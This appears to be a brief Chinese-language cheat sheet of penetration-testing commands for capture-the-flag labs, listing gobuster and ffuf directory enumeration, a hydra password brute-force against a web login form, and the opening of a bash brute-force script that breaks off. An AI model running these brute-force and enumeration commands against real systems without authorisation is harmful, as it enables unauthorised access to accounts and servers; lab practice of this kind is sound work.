目录
gobuster dir --url http://www.onlineshop.thm/ -w /usr/share/wordlists/dirbuster/directory-list.txt
gobuster dir -u 10.10.1.48/cgi-bin/ -w /Users/dionysus/CTF/tools/wordlists/dirb/common.txt -x sh,cgi带上后面的参数指定目录
ffuf -w /usr/share/wordlists/wfuzz/general/common.txt -u http://10.10.244.229/FUZZ
爆破密码
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.18.74 http-post-form "/admin:user=^USER^&pass=^PASS^:F=invalid" -V
su
爆破脚本加加
#!/bin/bashset -m #enable job controlexport TOP_PI ...